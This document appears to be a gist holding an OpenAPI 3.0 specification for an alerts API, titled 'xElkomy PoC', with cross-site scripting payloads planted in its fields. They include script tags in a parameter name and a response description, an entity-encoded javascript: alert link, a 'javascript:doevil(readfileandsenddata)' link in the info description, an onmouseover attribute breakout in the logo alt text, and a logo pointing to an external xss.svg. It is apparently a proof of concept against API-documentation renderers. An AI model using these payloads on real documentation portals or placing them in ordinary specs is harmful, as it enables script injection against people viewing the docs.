@xElkomy
Last active August 9, 2021 22:09
{
"components": {
"parameters": {
"alert": {
"description": "[xElkomyistoooooooooooooooooooooooooooooooooooooooooooooooooooo](&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29)",
"explode": false,
"in": "path",
"name": "<script>console.log(‘000000000000000000dad0000000000000000000');</script>",
"required": true,
"schema": {
"example": "alt-asdf1234",
"pattern": "^[A-Za-z][A-Za-z0-9-]+$",
"type": "string"
},
"style": "simple"
}
},
"responses": {
"ApiErrorsResponse": {
"content": {
"application/json": {
"schema": {
"properties": {
"errors": {
"description": "List of errors that occurred while processing the request.",
"items": {
"$ref": "#/components/schemas/ApiError"
},
"minItems": 1,
"type": "array"
}
},
"type": "object"
}
}
},
"description": "<script>alert('xElkomy')</script>"
}
},
"schemas": {
"Alert": {
"example": {
"crit": {
"operator": "<",
"value": 5
},
"info": {
"operator": "<",
"value": 5
},
"name": "name",
"post_to": "",
"warn": {
"operator": "<",
"value": 5
}
},
"properties": {
"crit": {
"$ref": "#/components/schemas/threshold"
},
"field": {
"$ref": "#/components/schemas/field"
},
"info": {
"$ref": "#/components/schemas/threshold"
},
"name": {
"description": "unique name for this alert",
"pattern": "^[A-Za-z][A-Za-z0-9-]+$",
"type": "string"
},
"operation": {
"$ref": "#/components/schemas/operation"
},
"period": {
"$ref": "#/components/schemas/period"
},
"post_to": {
"pattern": "^https://"
},
"warn": {
"$ref": "#/components/schemas/threshold"
},
"window": {
"$ref": "#/components/schemas/window"
}
},
"required": [
"field",
"name",
"operation",
"period",
"post_to",
"window"
],
"type": "object"
},
"ApiError": {
"properties": {
"detail": {
"description": "Explanation of what exactly went wrong.",
"type": "string"
},
"href": {
"description": "Request URL.",
"type": "string"
},
"status": {
"description": "HTTP status code.",
"type": "integer"
},
"title": {
"description": "High-level reason of why the request failed.",
"type": "string"
}
},
"type": "object"
},
"CreateAlertRequest": {
"$ref": "#/components/schemas/Alert"
},
"field": {
"description": "Data to query",
"enum": [
"record_usage.count",
"upstream_responses.count",
"upstream_traffic.traffic_bytes",
"upstream_latency.count"
],
"type": "string"
},
"inline_response_200": {
"example": {
"alerts": [
{
"crit": {
"operator": "<",
"value": 5
},
"info": {
"operator": "<",
"value": 5
},
"name": "name",
"post_to": "",
"warn": {
"operator": "<",
"value": 5
}
},
{
"crit": {
"operator": "<",
"value": 5
},
"info": {
"operator": "<",
"value": 5
},
"name": "name",
"post_to": "",
"warn": {
"operator": "<",
"value": 5
}
}
]
},
"properties": {
"alerts": {
"description": "List of stored values along with their aliases.",
"items": {
"$ref": "#/components/schemas/Alert"
},
"type": "array"
}
}
},
"inline_response_200_1": {
"example": {
"alerts": [
{
"crit": {
"operator": "<",
"value": 5
},
"info": {
"operator": "<",
"value": 5
},
"name": "name",
"post_to": "",
"warn": {
"operator": "<",
"value": 5
}
}
]
},
"properties": {
"alerts": {
"description": "The retrieved alert.",
"items": {
"$ref": "#/components/schemas/Alert"
},
"maxItems": 1,
"minItems": 1,
"type": "array"
}
}
},
"operation": {
"enum": [
"sum",
"mean",
"max",
"min"
],
"type": "string"
},
"period": {
"description": "How often to run this check",
"enum": [
"1m",
"5m",
"10m",
"30m",
"60m",
"12h",
"24h"
],
"type": "string"
},
"threshold": {
"example": {
"operator": "<",
"value": 5
},
"properties": {
"operator": {
"enum": [
"<",
"<=",
">",
">=",
"=="
],
"type": "string"
},
"value": {
"description": "Positive integer value",
"example": 5,
"type": "integer"
}
},
"required": [
"operator",
"value"
],
"type": "object"
},
"window": {
"description": "Window to query data across",
"enum": [
"1m",
"5m",
"10m",
"30m",
"60m",
"12h",
"24h"
],
"type": "string"
}
},
"securitySchemes": {
"jwt": {
"bearerFormat": "JWT",
"scheme": "bearer",
"type": "http",
"x-bearerInfoFunc": "impi.security.decode_token"
}
}
},
"externalDocs": {
"description": "xElkomy is here",
"url": "https://xelkomy.com"
},
"info": {
"contact": {
"email": "khaled.mohamed@xelkomy.com"
},
"description": "xelkomyishere # [Here is the demo link we provided you](javascript:doevil(readfileandsenddata)) #xElkomy PoC Inject External JsonFile \n",
"title": "xElkomy PoC",
"version": "0.1.0",
"x-logo": {
"altText": "Very Good Security Logo #![a\"onmouseover=alert`1`](https://www.google.com/image.png\"'onmouseover=alert(1)'",
"href": "https://www.xelkomy.com",
"url": "https://mytool-xelkomy.s3.eu-central-1.amazonaws.com/xss.svg"
}
},
"openapi": "3.0.0",
"paths": {
"/alerts": {
"get": {
"description": "Show all alerts\n",
"operationId": "fetch_alerts",
"responses": {
"200": {
"content": {
"application/json": {
"schema": {
"$ref": "#/components/schemas/inline_response_200"
}
}
},
"description": "OK"
}
},
"summary": "List alerts",
"tags": [
"alerts"
],
"x-openapi-router-controller": "openapi_server.controllers.alerts_controller"
}
},
"/alerts/{alert}": {
"delete": {
"description": "Removes a single alert.\n",
"operationId": "delete_alert",
"parameters": [
{
"description": "Alert to operate on.",
"explode": false,
"in": "path",
"name": "alert",
"required": true,
"schema": {
"example": "alt-asdf1234",
"pattern": "^[A-Za-z][A-Za-z0-9-]+$",
"type": "string"
},
"style": "simple"
}
],
"responses": {
"204": {
"description": "No Content"
}
},
"summary": "Delete an alert",
"tags": [
"alerts"
],
"x-openapi-router-controller": "openapi_server.controllers.alerts_controller"
},
"get": {
"description": "Retrieves an alert",
"operationId": "get_alert",
"parameters": [
{
"description": "Alert to operate on.",
"explode": false,
"in": "path",
"name": "alert",
"required": true,
"schema": {
"example": "alt-asdf1234",
"pattern": "^[A-Za-z][A-Za-z0-9-]+$",
"type": "string"
},
"style": "simple"
}
],
"responses": {
"200": {
"content": {
"application/json": {
"schema": {
"$ref": "#/components/schemas/inline_response_200_1"
}
}
},
"description": "OK"
}
},
"summary": "Get an alert",
"tags": [
"alerts"
],
"x-openapi-router-controller": "openapi_server.controllers.alerts_controller"
},
"post": {
"description": "Creates a single alert.\n",
"operationId": "create_alert",
"parameters": [
{
"description": "Alert to operate on.",
"explode": false,
"in": "path",
"name": "alert",
"required": true,
"schema": {
"example": "alt-asdf1234",
"pattern": "^[A-Za-z][A-Za-z0-9-]+$",
"type": "string"
},
"style": "simple"
}
],
"requestBody": {
"content": {
"application/json": {
"schema": {
"$ref": "#/components/schemas/CreateAlertRequest"
}
}
}
},
"responses": {
"201": {
"content": {
"application/json": {
"schema": {
"$ref": "#/components/schemas/Alert"
}
}
},
"description": "Created"
}
},
"summary": "Create an alert",
"tags": [
"alerts"
],
"x-openapi-router-controller": "openapi_server.controllers.alerts_controller"
},
"put": {
"description": "Update an alert\n",
"operationId": "update_alert",
"parameters": [
{
"description": "Alert to operate on.",
"explode": false,
"in": "path",
"name": "alert",
"required": true,
"schema": {
"example": "alt-asdf1234",
"pattern": "^[A-Za-z][A-Za-z0-9-]+$",
"type": "string"
},
"style": "simple"
}
],
"requestBody": {
"content": {
"application/json": {
"schema": {
"$ref": "#/components/schemas/CreateAlertRequest"
}
}
}
},
"responses": {
"200": {
"description": "OK"
}
},
"summary": "Update an alert",
"tags": [
"alerts"
],
"x-openapi-router-controller": "openapi_server.controllers.alerts_controller"
}
},
"/health": {
"get": {
"description": "Healthy or not",
"operationId": "get_health",
"responses": {
"200": {
"content": {
"text/plain": {
"schema": {
"example": "pong",
"type": "string"
}
}
},
"description": "OK"
}
},
"summary": "Return health of API",
"x-openapi-router-controller": "openapi_server.controllers.default_controller"
}
}
},
"security": [
{
"jwt": []
}
],
"servers": [
{
"url": ""
}
]
}